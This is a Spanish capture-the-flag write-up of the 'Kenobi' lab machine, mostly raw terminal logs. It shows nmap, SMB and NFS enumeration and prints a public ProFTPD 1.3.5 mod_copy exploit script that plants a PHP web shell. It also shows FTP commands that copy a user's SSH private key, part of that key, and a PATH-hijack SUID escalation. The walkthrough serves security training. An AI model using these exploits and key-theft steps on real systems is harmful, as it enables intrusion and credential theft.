Temas cubiertos en este desafío: Escaneo de puertos, Vulnerabilidades de ProFTPD, Uso de la clave SSH, Escalada de privilegios con identificación de usuario establecido (SUID)
¡Empecemos a hackear!
Introducción a la tarea: Al comenzar la tarea, me centré en comprender la descripción de la habitación, que involucraba el acceso a un recurso compartido de Samba, la explotación de una versión vulnerable de ProFTPD para obtener acceso inicial y la escalada de privilegios a root a través de un binario SUID.
Tarea 1: Escaneo de puertos con nmap: Ejecuté un escaneo de puertos utilizando nmap para identificar las vulnerabilidades presentes en la máquina objetivo. El comando utilizado fue:
nmap -p 1-1000 [TARGET_IP]
El análisis reveló 7 puertos abiertos, destacando el puerto 21 como un posible objetivo debido a la presencia de una versión vulnerable de ProFTPD.
Tarea 2: Enumeración de recursos compartidos SMB: Para enumerar recursos compartidos SMB, ejecuté el siguiente comando nmap:
Este escaneo reveló 3 acciones disponibles. Luego, utilicé smbclient para conectarme a uno de los recursos compartidos y exploré el contenido, identificando un archivo llamado log.txt.
Descarga de log.txt desde SMB Share: Usé smbget para descargar el archivo log.txt desde el recurso compartido. El comando utilizado fue:
smbget smb://[TARGET_IP]/[SERVICE_NAME]/log.txt
La exploración del archivo log.txt reveló la generación de un par de claves RSA y la presencia de información útil.
Identificación del puerto FTP: Identifiqué que el servicio FTP se ejecutaba en el puerto 21, según la información encontrada en log.txt.
Tarea 3: Enumeración de exportaciones NFS: Realicé un escaneo en el puerto 111 con el servicio rpcbind para enumerar exportaciones NFS. El comando utilizado fue:
El análisis mostró la exportación del directorio /var, que fue la respuesta a la pregunta.
Acceso inicial a ProFTPD: Al identificar que la versión de ProFTPD era 1.3.5, busqué exploits utilizando searchsploit y seleccioné uno para la ejecución remota de comandos.
Ejecución de exploit y acceso como usuario Kenobi: Copié las claves RSA de /home/kenobi/.ssh/id_rsa a /var/tmp y las descargué a mi máquina atacante usando NFS. Luego, utilicé las claves para obtener acceso como el usuario Kenobi.
Escalada de privilegios - Uso de SUID: Busqué archivos con bits SUID y encontré /usr/bin/menu. Al explorar este binario, descubrí que podía manipularlo para obtener un shell con privilegios de root.
Cambio de la variable PATH y ejecución del exploit: Creé un script falso de curl, le di permisos adecuados y lo agregué a la variable PATH. Luego, llamé al binario /usr/bin/menu y obtuve un shell de root utilizando el script falso de curl.
Resumen: El desafío involucró la identificación de vulnerabilidades, explotación de servicios, uso de claves SSH, acceso a recursos compartidos y escalada de privilegios. El aprendizaje clave incluyó la ejecución segura de exploits, manipulación de bits SUID y SGID, y la comprensión de la variable PATH para obtener acceso de root. Explorar diferentes caminos y entender el entorno fue esencial
Last updated
// Some code pentestingOfensivoKENOBI.txt
PENTESTING OFFENSIVE:
KENOBI:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -sC 10.10.112.128
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-16 23:03 UTC
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 28.57% done; ETC: 23:03 (0:00:15 remaining)
Nmap scan report for ip-10-10-112-128.eu-west-1.compute.internal (10.10.112.128)
Host is up (0.0076s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3ad834149e95d168d3b0f057be2c0ae (RSA)
| 256 f8277d642997e6f865546522f7c81d8a (ECDSA)
|_ 256 5a06edebb6567e4c01ddeabcbafa3379 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 41535/tcp mountd
| 100005 1,2,3 55359/tcp6 mountd
| 100005 1,2,3 56773/udp6 mountd
| 100005 1,2,3 59337/udp mountd
| 100021 1,3,4 36335/tcp nlockmgr
| 100021 1,3,4 39751/tcp6 nlockmgr
| 100021 1,3,4 42745/udp6 nlockmgr
| 100021 1,3,4 60953/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:67:C6:FA:4C:7B (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m50s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2024-01-16T17:03:20-06:00
| smb2-time:
| date: 2024-01-16T23:03:20
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.67 seconds
┌──(root㉿kali)-[~]
└─# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.112.128
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-16 23:18 UTC
Nmap scan report for ip-10-10-112-128.eu-west-1.compute.internal (10.10.112.128)
Host is up (0.00021s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:67:C6:FA:4C:7B (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.112.128\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.112.128\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.112.128\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
┌──(root㉿kali)-[~]
└─# nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.112.128
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-16 23:20 UTC
Nmap scan report for ip-10-10-112-128.eu-west-1.compute.internal (10.10.112.128)
Host is up (0.00019s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
MAC Address: 02:67:C6:FA:4C:7B (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.112.128\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.112.128\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.112.128\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
NOS CONECTAMOS AL RECURSO COMPARTIDO SMB DE ANONIMOUS SIN PASSWD Y DESCARGAMOS EL ARCHIVO .log:
┌──(root㉿kali)-[~]
└─# smbclient \\10.10.112.128\anonymous
Password for [WORKGROUP\root]:
\10.10.112.128anonymous: Not enough '\' characters in service
Usage: smbclient [-?EgqBNPkV] [-?|--help] [--usage] [-M|--message=HOST] [-I|--ip-address=IP]
[-E|--stderr] [-L|--list=HOST] [-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR]
[-c|--command=STRING] [-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]
[-g|--grepable] [-q|--quiet] [-B|--browse] [-d|--debuglevel=DEBUGLEVEL] [--debug-stdout]
[-s|--configfile=CONFIGFILE] [--option=name=value] [-l|--log-basename=LOGFILEBASE]
[--leak-report] [--leak-report-full] [-R|--name-resolve=NAME-RESOLVE-ORDER]
[-O|--socket-options=SOCKETOPTIONS] [-m|--max-protocol=MAXPROTOCOL]
[-n|--netbiosname=NETBIOSNAME] [--netbios-scope=SCOPE] [-W|--workgroup=WORKGROUP]
[--realm=REALM] [-U|--user=[DOMAIN/]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING]
[--pw-nt-hash] [-A|--authentication-file=FILE] [-P|--machine-pass] [--simple-bind-dn=DN]
[--use-kerberos=desired|required|off] [--use-krb5-ccache=CCACHE] [--use-winbind-ccache]
[--client-protection=sign|encrypt|off] [-k|--kerberos] [-V|--version]
[OPTIONS] service <password>
┌──(root㉿kali)-[~]
└─# smbclient //10.10.112.128/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Sep 4 10:49:09 2019
.. D 0 Wed Sep 4 10:56:07 2019
log.txt N 12237 Wed Sep 4 10:49:09 2019
9204224 blocks of size 1024. 6877100 blocks available
smb: \> type log.txt
type: command not found
smb: \> cat log.txt
cat: command not found
smb: \> less log.txt
less: command not found
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (2987.5 KiloBytes/sec) (average 2987.5 KiloBytes/sec)
smb: \> ls
LEEMOS EL ARCHIVO:
┌──(root㉿kali)-[~]
└─# cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
| |
| .. |
| . o. . |
| ..=o +. |
| . So.o++o. |
| o ...+oo.Bo*o |
| o o ..o.o+.@oo |
| . . . E .O+= . |
| . . oBo. |
+----[SHA256]-----+
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User kenobi
Group kenobi
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
DisplayLogin welcome.msg
DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
# server string is the equivalent of the NT Description field
server string = %h server (Samba, Ubuntu)
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
# wins support = no
# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
; wins server = w.x.y.z
# This will prevent nmbd to search for NetBIOS names through DNS.
dns proxy = no
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
# syslog only = no
# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
syslog = 0
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.
passdb backend = tdbsam
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap uid = 10000-20000
; idmap gid = 10000-20000
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 (default) means that usershare is disabled.
; usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
; comment = Home Directories
; browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
; read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
; create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
; directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
; valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/kenobi/share
browseable = yes
read only = yes
guest ok = yes
///////////////////////
IMPORTANTE DEL ARCHIVO .LOG
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
| |
| .. |
| . o. . |
| ..=o +. |
| . So.o++o. |
| o ...+oo.Bo*o |
| o o ..o.o+.@oo |
| . . . E .O+= . |
| . . oBo. |
+----[SHA256]-----+
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Set the user and group under which the server will run.
User kenobi
Group kenobi
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
//////////////////////
PROBANM=S EN LOS OTROS DOS SERVICIOS Y NEGA NADA:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.112.128/IPC$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> \*
\*: command not found
smb: \> dir \*
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> exit
┌──(root㉿kali)-[~]
└─# smbclient //10.10.112.128/print$
Password for [WORKGROUP\root]:
tree connect failed: NT_STATUS_ACCESS_DENIED
OTRA FOIRMA DE DESCARGAR LOS ARCHIVOS COMPARTIDOS POR SMB:
┌──(root㉿kali)-[~/smb]
└─# smbget -R smb://10.10.112.128/anonymous
Password for [root] connecting to //10.10.112.128/anonymous:
Using workgroup WORKGROUP, user root
smb://10.10.112.128/anonymous/log.txt
Downloaded 11.95kB in 2 seconds
CORROBORAMOS EL PUERTO 111 quQUE ESTA COMPARTIENDO CON SERVICIO NFS Y RPC LO MONTAMOS INCLUSIVE EN MI SISTEMA:
┌──(root㉿kali)-[~/smb]
└─# showmount -e 10.10.112.128
Export list for 10.10.112.128:
/var *
MONTAMOS EL RECURSO COMAPRTIDO PERO NO VEO NDA:
┌──(root㉿kali)-[~/montado]
└─# mount -t nfs 10.10.112.128:/var /root/montado
┌──(root㉿kali)-[~/montado]
└─# mount | grep nfs
10.10.112.128:/var on /root/montado type nfs4 (rw,relatime,vers=4.2,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=10.10.28.19,local_lock=none,addr=10.10.112.128)
CON SRIPT DE NMAP VENMOIS MAS INFORMACION:
┌──(root㉿kali)-[~/smb]
└─# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.112.128
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-17 00:04 UTC
Nmap scan report for ip-10-10-112-128.eu-west-1.compute.internal (10.10.112.128)
Host is up (0.00020s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836540.0 6877088.0 22% 16.0T 32000
| nfs-showmount:
|_ /var *
MAC Address: 02:67:C6:FA:4C:7B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
CONTROLAMOS EL SERVICIO PROCFTPD DEL PUERTO 21 Y NOS CONECTAMOS Y CON SUS COMANDOS PASAMOS LA KEY RSA DE KENOBI AL DIRECTORIO COMPARTIDO POR SMB EN VAR PARA LUEGO MONTARLO EN NUESTRA MAQUINAN Y APROVECHARNOS DE LEERLO:
BUSQUE SCRIPT EXPLOIT PARA LKA CVERSION DEL SERVIOCIO QUE CORRE:
┌──(root㉿kali)-[~/smb]
└─# searchsploit ProFTPD 1.3.5
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/smb]
└─# searchsploit -m linux/remote/36803.py
Exploit: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
URL: https://www.exploit-db.com/exploits/36803
Path: /usr/share/exploitdb/exploits/linux/remote/36803.py
File Type: ASCII text
Copied to: /root/smb/36803.py
┌──(root㉿kali)-[~/smb]
└─# ls
36803.py log.txt
┌──(root㉿kali)-[~/smb]
└─# cat 36803.py
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
print '\n Usage : exploit.py server directory cmd'
else:
server = sys.argv[1] #Vulnerable Server
directory = sys.argv[2] # Path accessible from web .....
cmd = sys.argv[3] #PHP payload to be executed
evil = '<?php system("' + cmd + '") ?>'
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('site cpfr /etc/passwd')
s.recv(1024)
s.send('site cpto ' + evil)
s.recv(1024)
s.send('site cpfr /proc/self/fd/3')
s.recv(1024)
s.send('site cpto ' + directory + 'infogen.php')
s.recv(1024)
s.close()
print '[ + ] Payload sended [ + ]\n'
print '[ + ] Executing Payload [ + ]\n'
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
if (r.status_code == 200):
print '[ * ] Payload Executed Succesfully [ * ]'
else:
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
print '\n http://infogen.al/'
┌──(root㉿kali)-[~/smb]
└─# nc 10.10.112.128 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.112.128]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
421 Login timeout (300 seconds): closing control connection
NOS VOLVEMOS A MONTAR POR SMB LOS RECURSOS DEL DIRECTORIO /VAR YA TENIENDO LA RSA COPIADAD CON LOS COMANDO DEL SERVICIO FTP PROFTPD Y BINGO SE TENSA:
┌──(root㉿kali)-[~]
└─# mount 10.10.112.128:/var /root/montado
┌──(root㉿kali)-[~]
└─# ls montado
backups cache crash lib local lock log mail opt run snap spool tmp www
┌──(root㉿kali)-[~]
└─# ls montado/tmp
id_rsa
systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
systemd-private-85854cf8e49f489b994d9a21472b5bdc-systemd-timesyncd.service-dfN4oS
systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
┌──(root㉿kali)-[~]
└─# cat montado/tmp/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
qpweZL+GJBB59bSG3RTPtirC3M9YNTDsuTvxw9Y/+NuUGJIq5laQZS5e2RaqI1nv
U7fXEQlJrrlWfCy9VDTlgB/KRxKerqc42aU+/BrSyYqImpN6AgoNm/s/753DEPJt
dwsr45KFJOhtaIPA4EoZAq8pKovdSFteeUHikosUQzgqvSCv1RH8ZYBTwslxSorW
y3fXs5GwjitvRnQEVTO/GZomGV8UhjrT3TKbPhiwOy5YA484Lp3ES0uxKJEnKdSt
otHFT4i1hXq6T0CvYoaEpL7zCq7udl7KcZ0zfwIDAQABAoIBAEDl5nc28kviVnCI
ruQnG1P6eEb7HPIFFGbqgTa4u6RL+eCa2E1XgEUcIzxgLG6/R3CbwlgQ+entPssJ
dCDztAkE06uc3JpCAHI2Yq1ttRr3ONm95hbGoBpgDYuEF/j2hx+1qsdNZHMgYfqM
bxAKZaMgsdJGTqYZCUdxUv++eXFMDTTw/h2SCAuPE2Nb1f1537w/UQbB5HwZfVry
tRHknh1hfcjh4ZD5x5Bta/THjjsZo1kb/UuX41TKDFE/6+Eq+G9AvWNC2LJ6My36
YfeRs89A1Pc2XD08LoglPxzR7Hox36VOGD+95STWsBViMlk2lJ5IzU9XVIt3EnCl
bUI7DNECgYEA8ZymxvRV7yvDHHLjw5Vj/puVIQnKtadmE9H9UtfGV8gI/NddE66e
t8uIhiydcxE/u8DZd+mPt1RMU9GeUT5WxZ8MpO0UPVPIRiSBHnyu+0tolZSLqVul
rwT/nMDCJGQNaSOb2kq+Y3DJBHhlOeTsxAi2YEwrK9hPFQ5btlQichMCgYEA7l0c
dd1mwrjZ51lWWXvQzOH0PZH/diqXiTgwD6F1sUYPAc4qZ79blloeIhrVIj+isvtq
mgG2GD0TWueNnddGafwIp3USIxZOcw+e5hHmxy0KHpqstbPZc99IUQ5UBQHZYCvl
SR+ANdNuWpRTD6gWeVqNVni9wXjKhiKM17p3RmUCgYEAp6dwAvZg+wl+5irC6WCs
